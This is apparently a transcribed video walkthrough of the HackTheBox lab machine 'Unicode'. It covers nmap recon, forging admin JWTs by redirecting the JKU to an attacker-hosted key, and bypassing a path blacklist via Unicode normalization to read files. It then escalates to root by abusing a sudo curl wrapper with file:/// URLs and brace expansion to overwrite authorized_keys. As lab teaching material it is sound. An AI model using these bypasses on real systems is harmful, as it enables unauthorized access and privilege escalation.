What's going on YouTube? This is Ipzak, me doing Unicode from HackTheBox, which starts off with hacking JWT tokens. It's a token that's signed with RSA 256 and it's a misuse claim vulnerability. It's a bit hard to explain, but it enables you to forge tokens. So we forge a token that calls ourselves admin, and then we gain access to the administrative functions of the web app, which include a LFI vulnerability. But to trigger the LFI, you have to bypass a blacklist that is preventing you from entering .. so you can't do directory traversal. However, after the blacklist checks user input, it does a Unicode normalization. So if you did Unicode in the user input, you can bypass that blacklist because a lot of Unicode characters look like the ASCII equivalent, as you can see in this title image, or maybe music. So like Under Pressure, you start hearing the start of that song and like, oh God, Vanilla Ice got me again. This is Ice Ice Baby. So they're look alike, but they're not the same, I guess you could say. So with that being said, let's jump in. As always, we start with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Unicode, and then the IP address of 10.10.11.126. This can take some time to run though, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP running on port 80. Its banner says it's Nginx also running on Ubuntu. So let's just go take a look at the web server because HTTP has a much larger attack surface than SSH. And going here, we see a page, Hack Media. There's a link here. It's going to 10.10.11.126/redirect and then sending us over to Google. So we can see that behavior here. If I do Control U, we can see the source code of the page. And what I'm looking for is like WP-, which would indicate WordPress, /administration. I'm just looking for like fingerprints of a CMS. I don't find anything. There is a login, as well as a register. So let's go take a look at both of these. We can try logging in with defaults like admin password, things like this, and we don't really get in. So let's try the registration out. I'm going to register IP and then the password of password. And then we go to sign in. So IP password. And we get to this welcome to Hack Media page. And there is a buy now link, a threat report, a log out button. We definitely don't want to click that one. And then just a bunch of various things. So looking at this, all these links look like they go nowhere. We do see a powered by Flask at the bottom. So we know this is going to be a Python web server. Looking here, we have various checkout methods. This icon is dead. If I open this in a new link, the Bootstrap logo is not on the server. So I was wondering if that would disclose like the host name of this box. If we do upload, there is a browse. I click that, and it's looking like it wants a PDF file. So what I'm going to do is a locate on my box, -r to allow regular expressions, and we just look for files that ending in PDF. And while that runs, we can go to the Unicode directory on my box. I don't want to go in nmap. And let's see. Let's take tip.pdf. I'm going to do a file against it, confirm, yes, that is a PDF. And then we want to upload it. So submit. And we get a thank you and nothing else. I'm going to manually check for like an uploads directory. We don't have anything. I wonder if it could be underneath of upload. We did like tips.pdf. We don't know where that upload actually gets stored. We could examine the request, but I don't think any good information will be there. So if I go in Burp Suite and let's intercept on, submit it. We do have a JWT token in our authentication. And how JWT works, why I knew it was JWT at first, is I double-clicked, and right off the bat, after seeing this, I saw a period. And JWT is 3 pieces. You have the header, then the payload. Where's the payload end? Oh, that's a short payload. And then the signature. And they're all base64 encoded. So like we can highlight this. We see it's decoded, selected text. Surprising it decoded again. Decoded URL encoding. Base64. I'm not sure why that's not decoding properly, but anyways. No good information here. If we wanted to actually decode this, maybe we needed like the equal signs. Yeah. So burp suite isn't doing it because of padding. So I make that valid base 64, and we see it decodes to a JWT. The type or the algorithm is RS256, and we have this JKU. Let's go over to jwt.io to make this a bit easier to play with, or at least see. So jwt.io, paste in our token, and I don't know why this dark mode theme did not apply. Is it on? It is. Oh well. So what we have, exactly what we saw before, type JWT, we have this JKU, and then the payload, user is IP, and let me see if I paste this again, there we go. And then we can put a public and private key if we have one. Now, this is a bit odd for JWTs because we normally don't see this JKU. We normally just see it being like, I want to say like HS256 or something. Yeah, like we see these algorithms, not RSA. And what is happening here is the JKU is, I want to say, an OAuth thing, like single sign-on. So if we wanted to authenticate our Google account to HackTheBox, we don't have Google's private keys. We have to find a way to trust Google somehow. So what happens is they put this JWK file, and the JWK file will contain information, or essentially the public key that can be used to validate the JWT token. So if we go here, we have to add a hackmedia.htb. So hold on one second, sudo v etc host. Let's do 10.10.11.126. That's not what I want. 10.10.11.126, hackmedia.htb. Save that. Then we go to the URL, and we have what the JWKS file is. And this is just information. It's saying like the algorithm it used, the KID is some identification. I don't think it's too important. Well, it's RSA. Here's the actual algorithm, RSA 256. But the key piece is the modulus and exponent, and is modulus in RSA. So this is how third parties can validate the key, because they get this JWT key that we sent. So in this case, let's say hackmedia.htb is Google, and HackTheBox is taking that key. And we want to allow Google logins, but Google won't give us the private key to sign their users, because if they did that, we could impersonate people. So they host this file. So when HackTheBox gets this key, they look at the JKU and be, oh, in order to validate that this key has not been tampered with, I can go download this file and then check it with the key. So that's essentially how it works. Now, one of the attacks of this is them not protecting the JKU file itself. So if we can edit the JKU and point it back to us, then of course we can put the modulus to be anything we want and then validate the keys. So that's going to be what we're going to be trying to do. So the first step is we have to change this to be an IP address, and here's going to be the annoying thing in JWT. As soon as we make an edit, if we don't have a signature, it erases everything. So I'm going to be doing it from the command line. So let's go back, and I'm just going to copy this. We'll do this JWT.header, and I'm in visual mode. We'll paste. That's not the right clipboard. That is. And we want this on one line. I wonder if I should have done it a different way. This should be fine. Actually, I'm just going to go back to my burp suite window, and we can take this cookie, right? Okay. Echo-n, base64-d. There we go. JWT.header. So if we edit this, we can change the URL. So we're going to point this to 10.10.14.8 /jwks.json. I'm going to put it on port 8000 so I don't have to listen on port 80. Just to make it easier. This is where like Python HTTP server and everything else listens on. So if we encode this, so base64 JWT.header W0, we can copy this, and then, let's see, just paste it in. And we have to find a URL that the key actually matters to. So if I go back to, where's that upload form? This thanks. If I hit this without a key, let's see exactly what happens real quick. So I'm going to refresh this, send it. We have to turn intercept on. And we're going to take this off. What's going to happen? Forward. It still says thank you. So this is not a good page to do it because there's no authentication on this upload page. If we go over to dashboard and we take off a key, what happens? So erase this cookie, forward it along, we get to the login page. So this is good. So if we refresh this and put our modified token here, and we can show, ooh, that's not a modified token, that's HTTP. Let's copy this again. Copy, paste, there we go. So this is a modified token. We can see the JKU is pointed to us. I'm going to do nclvnp 8000 to listen on the port. And when we send this request, we don't get a hit. And we go here and we see JKU validation failed. Now, the JKU validation failed, and it didn't even make it to us. So we know it's not doing some type of signing thing yet. It's doing like a check on the URL itself. So what we can do is hope that it's just checking that it begins with hackmedia.htb/static, because earlier on the web page, if we went back to the slash, we notice there is a redirect. So what we can do is if we went to hackmedia.htb/static, then // redirect $URL is equal to http 10.10.14.8 port 8000 jwks.json. If we went to this URL, we can see it will redirect us over to our burp suite. Or not burp suite, our thing, and it did not. That is weird. Static redirect 10.10.14.8. I'm going to redirect to 127.0.0.1 because maybe my Firefox window can't hit that, right? So if we redirect, it's still not hitting that. What if we get rid of this HTTP? Well, now it's taking longer to hit, and we have intercepted a request. So we know we don't want HTTP in this URL. So if we save this, and we put this as the JWT payload, so v jwt.header, this JKU, I'm now going to put hackmedia.htb/static. It began with HTTP, and then redirects us. So now if all the server is doing is checking to make sure it's coming from hackmedia.htb, it'll validate that, right? So let's encode this. And we don't care about the equal signs, so I can copy this. Let's do nclvnp 8000 again. Go over to burp suite, turn intercept on. We will, let's see. That's not the page we want. We just want this. So I'm going to delete this, put this header in, and when we forward this request, it's waiting for us. And we can see that 10.10.11.26, or 126, connected back to us, and it's looking for jwks.json. So this is really good. We have the server connecting back to us. We just have to create this jwks.json file and put some private key in it. So I'm going to make dir dub. We go in dub, and we can download the JWK. So I'm just going to do a wget on this file. My clipboard's been wonky. There we go. So v jwks.json. And now that the server is coming back to us, we can change the N and the E because we just have to make our own key. And if you want a really good post about this, if you just Google like JWT Claim Abuse, I believe it is. Let me turn Burp Suite off. It should bring us to this Pentester Academy blog, which is pretty good on it. It's just pretty lengthy, as you can see my search bar, so I won't be using that. Essentially, the first thing we have to do is generate the key. So I'm going to do ssh-keygen -t RSA, block size 4096, create a PEM, and JWT rs256.key. That's going to be the out file. We're not going to put a passphrase on it. And now we just have essentially an SSH key, right? If we do JWT rs256, we have the private key here. Now, we just need to get the modulus and exponent out of this. So I can do openssl rsa-text-no out in. We can do JWT rs256.key.pub, I believe. It wants the public key. The private. We can get it from the private key. I'm sure we can extract these from the public key as well. I just don't know the syntax off the top of my head. But we have like all the information we want about this private key. The two exponents it's using, the primes. Let's see. Here's the public exponent. And it's this. And I bet if we go to like decimal to hex and look at this, convert it. I was hoping we'd get what we got on the JKU. Let's see, cat JWT.header. Oh no, we want JWK. Oh, we're in dub. Cat this file. JWKS.json, AKAB. That's what I was expecting to get. Let's go GCHQ cyber chef. Oh, that's probably base 64. Let's try this real quick. 65537. Convert. If we base 64 this, what do we get? Echo-n, base 64. We get that. Let's see, 0x. If we convert this from hex out, I don't know how to get that exponent. Let's see. Just going to GCHQ cyber chef. Cat jwks.json AKAB from base 64 to hex, and we get this. So that is hex encoded. I'm just having trouble like converting from hex whatever, but where is my public key? I think it's up here. Okay. So exponent. That's 1, 2. Where is it? Public? There we go. So, yeah. We see 0, 1, 0, 0, 0, 1. We don't have the 0 here because you can just strip this off in hex. It doesn't mean anything. But you can see 0, 1, 0, 0, 1. So that is what AQAB is. We don't have to change that. The only thing we need is that modulus. So I can do a dash modulus, and we get this. And actually, I think I know how I could get this. I bet if I echo that, xxd-r-p, base 64. There we go. So that's how we can convert it from hex and then base 64. Because we're going to do the same exact thing to this. So echo all this, then xxd-r to reverse, and p, it's making so it's not that 3-column output that it's expecting. And then we do base 64, and we want to put it on one line. And now we have the modulus that we can just put in our JWKS file. So if we take this out, paste this in, and we start a web server, HTTP server. It's already on port 8000. Then let's cat JWT rs256.key, xclip-selection clipboard. To copy it, we go to jwt.io, put that in the private key, cat the public key. Is that what we want? I don't think so. Let's see, invalid signature. We probably need to convert this into a different format. I wonder if I can just copy like this line and say public key. And it starts with begin, right? If we do this, does it accept it? Invalid signature. I was hoping it would automatically sign this. Because I don't think it wants it like this, right? Whoops. Copy, paste. Like there's no way this will say key validated. Yeah. So we have to figure out how to convert this into a public key. So let's go over to Google. We can say openssl RSA private to public key and hope it gives us something. Let's see, out. Maybe this -pub out option. Let's do openssl RSA in JWT rs256.key -pub out. That's looking better. I think we can say -out, and then we want key.pub. That seems fine. If I cat this now, JWT rs256 key.pub, hopefully this works. It's in a better format. I think this is a different thing than we were seeing with that SSH. I don't have that anymore. Let's see. Control Z. Yeah, SSH began with AAA, and this does not begin with AAA, so completely different. If we paste this in, signature verified, let's modify it. Sweet. So now we have a valid signature. So I can do user, and we can change a user to whatever we want. I'm going to change it over to admin because typically most web apps have a user called admin. And then we can copy this whole token and go back to our page. I'm going to do F12, and we're going to edit this auth. I'm going to change the value to be our new token. So now when I view it, we're not getting anything. However, we were listening on port 8000. Let's go back to jwt.io because we forgot to update the JKU. So do we have that somewhere here? Cat .. JWT.header. And we can copy this to change this. And now we can update our cookie to be the new one. And when I refresh this page, we have a completely different page that we haven't seen before. So this is the admin dashboard. So if we go back here, we can see it did do a get on our web server. So if I go to orders, we can go products. If I click on this plus for saved report, nothing. I have a page is equal to something here. So chances are this is going to be what we want to attack. And we can see a lot of times when we click, the web server is making requests because it's validating our token. So I'm going to hit enter here, send this to repeater. And every time I send this, I'm going to send 3 times. There we go. We have more hits. So every time we're sending this, we're getting something. So I'm going to do a WFUZZ against this soon. But the first thing I want to check is standard LFI, right? And if we do this, we get directed to a /file not found. So if we follow this redirection, we get something. So let's just put that so we can view it. So I'm going to copy this, put it here, forward it, turn intercept off, and we see it's a 404, but they do a lot of input filtering. So chances are we have to bypass some type of filter because that's not the standard 404. If we do a random thing, it just says 404, So this /file not found does bring us a warning message about filtering. Now, we could pass this over to like an LFI script. So that's generally my go-to with like WFUZZ or FUF or something. So I'm going to do WFUZZ because I remember that syntax off the top of my head. But I can do HTTP : / 10.10 11 126. We want to grab this. Come on. And then the page is going to be fuzz. The word list we want to use. Let's do opt, sec list, discovery, fuzzing. Or is it fuzzing here? Fuzzing. If I look, there is a LFI directory. So I'm going to try like this LFI JHackTricks, right? So let's do opt, sec list, fuzzing, LFI, this. And when I run this, we get a lot of random status codes, right? Is this getting all the pages? Oh, if we look here, we're not getting anything. I'm going to move the WFUZZ to the other pane so we can see simultaneously what's happening here, right? We're not getting any hits on our JWKS, and that's because we didn't specify the authentication. So I can do -h, cookie, and then we copy and paste this, right? So now, when I do this, the web server is going to be getting our JWK. Now, I don't know what these... So we got 302s. We get 503. I don't know exactly what that 503 is. If I go back to Burp Suite and we send this one URL, we have a 302 here, right? And what I think is happening is the Python web server is pretty slow. So what I'm going to do, we can do -- hide code HC 302. We're seeing a bunch of 503s. db.php was 200. What? If we look at db.php, that is 200. But this is a Flask app. That's weird. I see astronaut things. Let's actually refresh the page and see exactly what db.php is. db.php not found. So we may want to hide things that are 516 lines, right? HL 516. We get 503s still. And what is happening is this Python web server can't keep up. It's single-threaded, and WFUZZ is multi-threaded. I bet if we do like -T1 to set one thread, it's going to go slow, but we're no longer going to get those 500 errors. If we just stood up like Apache web server, I think we'd be fine because it can handle that, right? If we, instead of this server, we do php-s, I want to say 000 8000, like that. Now we have a PHP web server. Is this working? Failed to open stream, unknown line 0. Maybe I do /. Let's see. History, grep php-s. Do I have in my history? Web server started. Okay, sweet. Because I think the PHP web server is actually a bit faster. Maybe not. Let's see. Let's just start sudo service apache to start. And we'll probably have to modify this to be port 80. Actually, sudo v etc apache 2, sites enabled, 00 default. Let's change this to be virtual host 8000. Start and restart. So is Apache now listening on port 8000? Grep 8000. It is not. It is listening on 80. Maybe I should just change my JWT token. That may be the quickest thing to do here. Port, let's see. Go here. I wonder what this 098 is. 9876. Don't remember what that's from. So I'm just going to change the JWT payload. Let's delete all this. Okay. cp jwks.json for www.html. Sudo. And I think we should be good. If I just go to localhost, we have this JSON file. We can view it. Awesome. So we have to go back to jwt.io, remove port 8000, and then in our wfuzz command, I'm going to laugh if we still get all those 500 errors. And there's probably a hotkey I can do to delete all of this, but I'm just going to do it the painful way. Okay, now that's deleted, paste in the new key, and we still get those 503s occasionally. So I wonder if that's just some type of bad name. But this was a big, kind of rabbit hole because this whole LFI WFUZZ doesn't really bring us anything. We could do comma 503 to also hide those. And we don't get any results. Now, the name of the box is Unicode, right? So wonder if we can trick this because we know there's some type of filtering on etc past WD. So my first question here is, what exactly is filtering? I'm going to start removing things to see when we get directed away from... we have to update our JWT here because we're no longer listening on 8000. Let's see. Because I just noticed we're getting directed towards login, right? So let's copy our cookie and paste it in here. Okay, we're no longer getting directed to login. We're getting directed to file not found. So this is the correct error message. And notice when we remove etc and past WD, it gets removed. I'm going to just try does not exist Does this get redirected to file not found? No, we do the 200 OK. Dot dot, nope, 200 OK. Dot dot slash 302 found. So dot dot slash is going to be a bad character. We could try to encode this in Unicode and hope it does some type of normalization. And the main reason I'm thinking of that is the whole box. Generally, this type of attack works really well when there's a web application firewall in between you and the app, because by the time it gets to the app may just get regular format. The web application firewall sees its Unicode and does a bunch of string comparisons. And of course, the string doesn't match because it's slightly different. You notice this a lot when you copy payloads from a Word document into your terminal. And you'll notice every time you do that, you get those angled quotes and things just don't work because you got a character that looks like a quote, but it isn't exactly like that. So that's what we're going to look here. And whenever I want to get to an attack, I normally just Google HackTricks, and then we can say Unicode normalization and see what it talks about here, because it probably gives us some good characters to try this off with. We could also check payload all the things, but here's things Unicode characters, and we want a slash. So this will be encoded into a slash. So let's try dot dot that gibberish. We do 200 OK. So let's try this a few times. And then etc passwd. And we get the contents of etc passwd. So it is vulnerable to some type of Unicode normalization attack because this slash isn't a slash. It is this, and the application's converting from Unicode back down to ASCII after the filter comes in place, right? So now we have to figure out where this web server is. And generally the first thing I always do is proc self cmd line. And we see this is using UWSGI, localhost on port 8000. The file name is probably going to be app. We can try checking out the environment. So environ. Use the local. Its home directory is home code. So chances are we're going to be the code user. We also see user equals code, so that tells us. It's in a bash shell. We don't really have anything else there. We could just try app.py because we saw app before. And we don't have anything because we're going through all this Unicode stuff. But if I just do page app.py, we don't get anything. Maybe app/app.py? No. Let's see. What else can we do? I wonder if we do home coder.bash history. And we may have to there's where that one time it directed us to a login, and then the other times it didn't. I'm Control-Zing back to get here. And we can try home coder.bash history to see if there's anything here. It doesn't look like there is. Let's see. We can try app.py. Nothing. Wonder if it's in a directory called app. Nothing. So we don't know exactly where this application is. There is another handy directory, and that is proc self cwd. This is going to be the current working directory. So we can do app.py there, and here we go. We have the Python application. So this is just the working directory of the process. So if I go here, let's see. If we do echo ... that's going to be the PID of my process. So if I cat proc this cwd, or if we do an LSLA on it, we can see where is cwd is pointing to this. We could also have done proc self and grep cwd. I thought we could have. Is that not working? Proc self. Okay, we need the trailing slash. I was like, that's weird. But grep cwd, we can see it's a symlink to var.html because that's our working directory. If I just go here, we do it again. Now the working directory is home ipsec. So this whole CWD directory is super helpful for dealing with LFIs. So we don't even know where we are. We just know we can do proc self CWD and get it. So we got MySQL user, and it's opening up db.yaml. So I'm just going to replace app.py with db.yaml, and we have localhost, code, and then the password bestcoder2021 at bang. So I'm going to try SSHing with those credentials. So code at 10.10.11.126. Was it code or coder? Code. Paste this in. And we get into the box. And the actual web app directory looks like it may be coder. So if we knew and we did page is equal to coder/app.py, it still doesn't work. We probably need like one .. or something. I'm not exactly sure why. Actually, just app.py should have worked because we're in current working directory. Maybe at the end of the box we can look into this LFI and exactly what went on here because I'm confused why app.py didn't work. Oh, it's probably pulling it from like an upload directory. So we probably need .. /app.py, right? Yeah. So the Python code is probably coded saying pull the page variable and then go into it's going to be like file is equal to uploads/page. So we're no longer like here is not going to be in current working directory because we're hard coded to go into a directory in the app. So that's why we just need one .. But the easy way to do it is current working directory. So that gets us onto this box. And the first thing I always check is sudo when I'm a user. And we can see I can run this binary TREPORT. So if I do sudo this, we can create a threat report, read it, or download. So if I do one, I'm going to do ipsec, enter the report. I don't know what the report is. Choice. What is this? It's giving multiple. I'm just going to Control-C and redo it. And we see it's executing treport.py when I did that. So we may want to try to find this file as well, because maybe we can just edit it, right? The threat reports, we have ipsec. So enter choice. Let's see. Find /grep this. And we want to hide error messages to dev null. And I know you can probably use the file name with the find command. I just always, for some reason, get that syntax wrong, and this is the easiest way for me. So let's see. Let's try download a threat report, IP and file name. I'm going to do nclvnp 80. We'll sudo that so we can listen on 80. Apache's running. Service Apache 2 stop. We have to do sudo. Now we can listen on 80. And we can say 10.10.14.8/test. And it's using curl. So that's interesting. Let's see, we can do this again, download, and we can say 10.10.14.8/who am I? And see if we get code execution this way. Not allowed. So it did not like that. We can try 10.10.14.8 backticks, who am I? Not allowed. So that's not working. Wonder if, let's see, download a threat report. What if we do HTTP 10.10.14.8? Does it still connect? It does. So one of the weird things is, well, not weird, but from doing a lot of CTFs, one of the things that is in my mind is we're in a Python application right now, and it's using curl. it's not using the request library. And that's a very nuanced thing, but maybe it's like a quote-unquote master recon thing of knowing, because the request library doesn't allow a lot of file wrappers. It can only pretty much do HTTP and HTTPS. If you look at the man page, they say because request is HTTP, we don't want to allow like Gopher and all those other weird things. So if I do file : / let's just do root.txt. Do we get it? Invalid URL. Let's see. I wonder if we escape something. So in bash, if I echo file like this, it's still file because the / is an escape. So this is an easy way to bypass a lot of filters. Did not like something. Let's see, FILE. Let's do 3 slashes. And it downloaded it. If I do exit out of this, I don't know where it downloaded it to. It definitely accessed it, right? But nothing else. Let's do download report, FILE, : 3 root.txt. And then we can say -o for out file, I believe. We can say temp root. And it says invalid IP. So we could try the IFS. So IFS, and by default, IFS is always going to be space. And it says file not found. Oh. Let's try actually doing it when we're in the right prompt. So we do this. It says not allowed. There's another way we can do spaces in bash, and that is through expansion. So if I do echo hi, it's just going to convert all the commas here to spaces. So that's a different evasion technique. So we can say FILE like that, root.txt, and then comma, -o, comma, /temp root, and see if we bypassed it. It says it downloaded. If I go to cd/root, or cd/temp, we can see root and get the flag. So we could have also, knowing that we can write files, we can probably download a threat report and then say it's on 10.10.14.8 / we can just say authorized keys, and we want to shoot. I have to put this in brackets / authorized keys, and then out to root.ssh, and let us ssh-keygen -f, we'll call this root, move root.pub to authorized keys, Python 3-m HTTP server, and we want to listen on port 80. There we go. So this should download the authorized key file and save it to root.ssh. It downloaded it. I don't know if it saved it though. We can just try SSHing with it. So ssh-i root at 10.10.11.126, and it did not. So authorized _keys -o. Let's actually specify the whole file name. Maybe that's what it wants. 3. Then we can say authorized keys. If this doesn't work, I'm going to guess the SSH directory doesn't exist underneath of root. That time it saved. We do this, and we get in. So that was it. We can always go now to the root and read the key if we wanted to, but the main thing I want to do is look at this application a little bit. So looking at it, the question we had was what it did with the file include, right? So I'm going to go into app. I'm going to search for page, and we see request args get page. And right here, it's looking for the .. So if it starts with .. or /etc or /proc or /user, we have 2 of these etc's. That's weird that they did this twice. But if it starts with those, then redirect them to this file not found. Otherwise, it's going to normalize the Unicode, which this is weird. I don't really like how they presented this, but because normally, like, the web application wouldn't do this Unicode normalization, but this attack path does exist mainly when you have some type of web filtering thing before your web app. So like blue coats, mod security, maybe things like that, or maybe even load balancers. So I can forgive this because they're trying to present it in a way where you do Unicode normalization. Obviously, it's an attack because it's on HackTricks. So what I was looking for is that open, though. So else we're going to get this. And here we go. It's going into files plus save page. So I want to look at what's in files, right? So if we go to coder, files, we can see monthly.php PDF and quarterly.pdf. We didn't see the thing we uploaded, which was like note.pdf. So that's what I mainly want to look at is this upload thing. So I'm just going to do a search on upload and see how it is. So let's see. Post, it's PDF, docx, PHP, Python, ASP. So it's actually allowing PHP files, I guess, because it's a Python web server. It doesn't matter. And it doesn't do anything with them, right? So we don't actually have an upload vulnerability because we got this request method post, and then it just says thanks, right? Or file not loud. I don't see anything where it's downloading. I don't know what this /debug is. We do have a /debug. So this is probably because we didn't run GoBuster. We're finding all these endpoints, right? So if we do /debug, bad gateway. Let's see, debug value get. It's weird. 10, 11, 126. Did we just, is the whole app down? No. Debug value equals 1. I'm not sure why this debug is changing. Pricing, checkout. I wonder if we need to stand up our Apache again. So let's do sudo service apache 2 start. Okay. And refresh. So I was just wondering if it was trying to get our JWT token, and I don't see it doing that. So I don't know what's going on here. We can look in Apache. Oh, it's Nginx, right? So sites available, less default. Debug? I don't see anything. We do have a rate limit, but it's going on localhost 8000, proxy. I don't really see where that debug thing is. So that's weird. We can go back into code, coder. Maybe debug has to be true. Well, it is true here. App route, def debug. See this upload. Maybe it's because it doesn't have a method. There's no method tied to /debug. But there's no method tied to pricing, and it works. Oh well. I don't understand what's going on here. That's the danger of doing like this exploration as like live. We can look at like /internal, none type none, so it's just getting the traceback error. Let's see. Yeah, we don't have a method on this file not found, and this definitely works. So I think that's going to be it. We can look at how they validate the JKU, right? So right here, it's loading the token, doing things, and if the JKU starts with hackmedia.htb/static, then do things, right? So that's why we had to set that and not have it be like just straight 10, 10, 14, 8. And why we needed a chain that redirection. But I was looking for the key. Here we go. So on login, we have this. And how's it signing the key? Priv. Okay, so it's just doing JWT encode user priv algorithm. So this is how they create that token. So that's going to be it. Hope you guys enjoyed the video. Take care, and I will see you all next time. Oh, wait. Username is equal to admin. Is there actually a user called admin or not? I wonder, hold on. There's a database here, right? Cat db.yaml, MySQL-u, code-p. There's got to be a database, the admin user, right? I was just wondering, can we just register admin? Because I noticed like it was saying username equals admin. It didn't do like a group. So show tables, show databases, use, I'm guessing user, show tables, select star from user info, and I don't see admin. What if we register as admin? Would that just bypass the whole token step? That'd be a stupid bypass. Let's see. Clear it. Clear history. And again, these are all things like I do after I pop the box. Just looking out, seeing if I missed an unintended now that I can register. So I try to register as admin. Admin password. And I can't log in, right? That just did not let me. Admin password. Why didn't that let me? Log in. Okay, this is the login. Oh. If we attempt to log in with username equals admin, then it's been blocked. Is that what it was saying and redirecting me? Burp suite, admin, password, login, proxy. Huh. Oddly enough, I don't think that is telling me I'm blocked. Because I read this as, I hit this login, I'm doing a post. So here we are in the post method. We go down, username get user, password. If username is equal to admin, it's blocked. Was it actually testing login? Can we just log in with any user? Let's see. There's something I don't understand with this app. Login. Login? No, it's doing something, right? This is a test. Password, password. Yeah, it definitely does something with that. We can delete this cookie. I wonder if that wasn't the right table. Let's see. No, because there's my password. Cat db.yaml. MySQL. We should now see admin. use user, show tables, select stir from user info. Yeah, admin password. Let's see. So app config, MySQL. So on register, we're doing a MySQL connection. That's fine. That makes sense when we register. And that's anywhere I see MySQL. Redux to login. Okay. On a post, we do this. We have priv, username. So if username is equal to admin, then, oh. Is it ever actually saying that? Is login.html admin password? So I think I spotted what I was confused about. So let's intercept this in burp real quick. Because I'm guessing that passing a message to a template that does not accept messages. Yes, that is what happened. So if we look at this code, we see if username is equal to admin, then they put this message, access to admin account is blocked, and do render template login, and message is equal to message, right? But this login template doesn't ever use message. If I go into login, templates, the login.html, and search for MSG, there is none. There's probably a template that does do something. Let's just grep everything for %, because I don't remember the syntax off the top of my head. And we get numbers, shoot. Let's see. I'm going to Google real quick. J2 Jinja2 example template. Most Python applications will use the Jinja2 framework. So that's why I did this Jinja2 example template. Jinja2 example template. And I think it's just like this %. So Jinja2 example template if variable exist. Test of variables. This is probably not going to be the correct way. I don't even think I need is defined. I think I can just do is variable, right? So let's go vlogin. And then what's the login page look like? Login. We're going to look for your username. Your username. Okay. You can say if MSG. I think we can just do this, right? And then end if. Let's see. Still did not find it. I'm going to do it right at the top. I'm going to do it before the HTML because this way we know it hits. And then we can move it to a place that we want. So we hit this. We're not getting anything. We should test. Make sure this is live, right? So that is live. So let's see. Jinja2. We need to open close brackets. That's what I was missing. So if I do this, I was expecting to get user does not exist. Let's see. If I don't do that if, nothing. Jinja2 display variable. This definitely should be working. So we're hitting post to dashboard. Maybe it's to login? This is weird. So admin password. So we post a dashboard, and that is the intended way. Is that what we're seeing in the code? V app.py. Where are we here? One login. App route dashboard. If has auth, that's fine. See, if I change this to login, there we go. So we have the message there correctly. If we hit the correct endpoint, the message is there. I'm not sure why we're posting to dashboard though. That is weird to me, because this doesn't look like it has any code for logging in. Render layout login.html. Dashboard, use the dashboard, login. So I'm not sure what I did wrong. We can go back to login and we can say if MSG and if like this. So now when we send this again, we're getting bad gateway because we have bad code. Probably that extra bracket, right? Okay, this is like the beyond root that's never ending. Once upon a time, I'd be able to do this quickly. I just forgot all about Jinja, apparently. If variable is defined. We can try this. If MSG is defined, then end if. Is this going to give me... Okay, that is good. We can move this now down to... Well, actually, before we do that, if we change this, user does not exist. Now we're getting error messages. So let's take this, go to login, body container. Let's just put it down here. There we go. And I think we finally fixed this app, right? So let's turn this off. Run the login form, do something that doesn't exist. And we have an error message, user does not exist here. So that is better. I wonder if we move it into the wrapper. Where does this go? Behind. It's not exactly what we want. we probably want to create a special place for this, but their message is going there now. That is looking better. I bet if we move this above. There we go. User does not exist. So I hope you guys enjoyed me fumbling around playing with Jinja. Maybe that would look better if we put it below the submit button, right? Like that. So now when we log in, we have that. If we log in with admin password, we have access to admin is blocked. So that whole error message piece, hope you guys enjoyed it. That'll be it. Take care. I will see you all next time.